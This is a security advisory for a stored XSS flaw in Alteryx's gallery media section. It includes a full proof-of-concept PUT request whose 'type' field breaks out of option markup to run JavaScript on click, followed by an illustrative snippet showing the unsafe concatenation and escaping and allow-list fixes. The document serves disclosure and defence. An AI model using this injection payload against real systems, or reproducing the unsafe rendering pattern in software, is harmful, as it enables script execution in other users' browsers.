Product: Alteryx
Version: (?, 2022.1.1.42590) - Tested on version 2022.1.1.42590
CVSS: 6.5 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Vulnerability: Stored Cross-site scripting (XSS) – Media
Using the media management feature, an admin is able to set an erroneous file type instead of a valid one. Through this feature, the admin can inject JavaScript code and thus trigger an XSS.
- As an administrator user, go to the Media section.
- Update a file to inject malicious JavaScript code, as shown in the following request:
PUT /gallery/api/media/$MEDIA_UUID/ HTTP/2
Host: alteryx-host.com
Cookie: $COOKIE
User-Agent: Mozilla
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Cache-Control: no-cache
X-Authorization: $AUTH
Content-Length: 176
Origin: https://alteryx-host.com
Referer: https://alteryx-host.com/gallery/admin/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
  "extension": ".None",
  "fileName": "NULL",
  "thumbnail": null,
  "title": "NULL",
  "type": "\"onclick='alert(\"XSS\")' style=display:block>Malware</option>",
  "id": "$MEDIA_UUID"
}
- The user opens the media section and uses the filter to select the "Malware" entry.
- The application triggers the execution of the JavaScript contained in the payload placed in the type field.
Credit: GRILL Dylan
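
Added example, not part of the original advisory and not Alteryx code: it shows why the stored `type` value breaks out of the filter markup, and the two mitigations (output encoding at render time, allow-list validation on the update endpoint). The `<option value="...">` markup, the allow-list values and all function names are assumptions made for illustration.

```javascript
// Assumed rendering of the media-type filter; not the product's real code.

// Constructed sample: the "type" value from the advisory's PUT body, JSON-decoded.
const PAYLOAD_TYPE = "\"onclick='alert(\"XSS\")' style=display:block>Malware</option>";

// Hypothetical allow-list of media types the gallery would accept.
const ALLOWED_TYPES = new Set(["Image", "Icon", "Banner"]);

// Vulnerable pattern: the stored value is concatenated into an attribute
// and a text node, so a leading double quote closes value="" early.
function renderOptionUnsafe(type) {
  return '<option value="' + type + '">' + type + "</option>";
}

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Mitigation 1: encode on output, so the stored value stays inert data.
function renderOptionSafe(type) {
  const t = escapeHtml(type);
  return '<option value="' + t + '">' + t + "</option>";
}

// Mitigation 2: validate the update body before it is stored.
function validateMediaUpdate(body) {
  const errors = [];
  if (typeof body.type !== "string" || !ALLOWED_TYPES.has(body.type)) {
    errors.push("type: not an allowed media type");
  }
  if (typeof body.extension !== "string" ||
      !/^\.[A-Za-z0-9]{1,8}$/.test(body.extension)) {
    errors.push("extension: invalid format");
  }
  return errors;
}
```

Encoding alone neutralises the payload at render time; the allow-list additionally keeps the erroneous type from being stored at all.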